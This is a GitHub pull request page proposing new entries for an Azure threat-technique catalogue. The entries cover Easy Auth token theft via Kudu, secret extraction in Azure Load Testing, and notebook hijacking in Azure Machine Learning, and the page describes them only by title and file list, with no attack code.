Skip to content

Add AZT606/AZT607/AZT304#20

Open
swzhouu wants to merge 10 commits into
microsoft:mainfrom
swzhouu:main
Open

Add AZT606/AZT607/AZT304#20
swzhouu wants to merge 10 commits into
microsoft:mainfrom
swzhouu:main

Conversation

@swzhouu

@swzhouu swzhouu commented Aug 27, 2025

Copy link
Copy Markdown

Title: Add AZT606 – Steal App Service Easy Auth Tokens (Kudu decryption)

This PR proposes a new Credential Access family for stealing Azure App Service Easy Auth tokens, with an initial sub-technique covering token file decryption via the SCM/Kudu site.

  • Adds docs/CredentialAccess/AZT606/AZT606.md (family overview)
  • Adds docs/CredentialAccess/AZT606/AZT606-1.md (App Service Token File Decryption via Kudu)

Notes:

  • AZT606 is a placeholder ID; feel free to renumber or relocate.
  • Content references publicly available research (NetSPI, Daze Security) and Microsoft documentation; no proprietary details included.

@swzhouu

swzhouu commented Aug 27, 2025

Copy link
Copy Markdown
Author

Title: Add AZT607 – Extract Azure Load Testing Secrets and Tokens

This PR proposes a new Credential Access family for Azure Load Testing, with one sub-technique covering code execution in JMeter/Locust tests to extract injected secrets/certificates and obtain Managed Identity tokens.

  • Adds docs/CredentialAccess/AZT607/AZT607.md (family overview)
  • Adds docs/CredentialAccess/AZT607/AZT607-1.md (JMeter/Locust code execution to extract secrets/tokens)

Notes:

  • AZT607 is a placeholder ID; maintainers may renumber or relocate.
  • Content references publicly available research (NetSPI) and Microsoft documentation; no assumptions beyond cited behavior.

@swzhouu

swzhouu commented Aug 27, 2025

Copy link
Copy Markdown
Author

Title: Add AZT304 – Hijack Azure Machine Learning Notebooks (via Storage Accounts)

This PR proposes a new Execution family covering AML notebook hijacking by modifying .ipynb files stored in the workspace’s backing Storage Account (Azure Files). The initial sub-technique details Storage Account notebook overwrite leading to code execution, with related detections and mitigations.

  • Adds docs/Execution/AZT304/AZT304.md (family overview)
  • Adds docs/Execution/AZT304/AZT304-1.md (Storage Account Notebook Overwrite)
  • Includes references to NetSPI research, MicroBurst tooling, and Microsoft documentation.

Notes:

  • The ID is set to AZT304 per your request. Maintainers may still renumber or relocate.

@swzhouu

swzhouu commented Aug 27, 2025

Copy link
Copy Markdown
Author

@microsoft-github-policy-service agree

@swzhouu swzhouu changed the title Add AZT606 – Steal App Service Easy Auth Tokens (Kudu decryption) Add AZT606/AZT607/AZT304 Aug 27, 2025
@swzhouu

swzhouu commented Aug 27, 2025

Copy link
Copy Markdown
Author

Add Jiraput Thamsongkrah (swzhouu) to acknowledgments

@swzhouu swzhouu mentioned this pull request Aug 27, 2025
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@swzhouu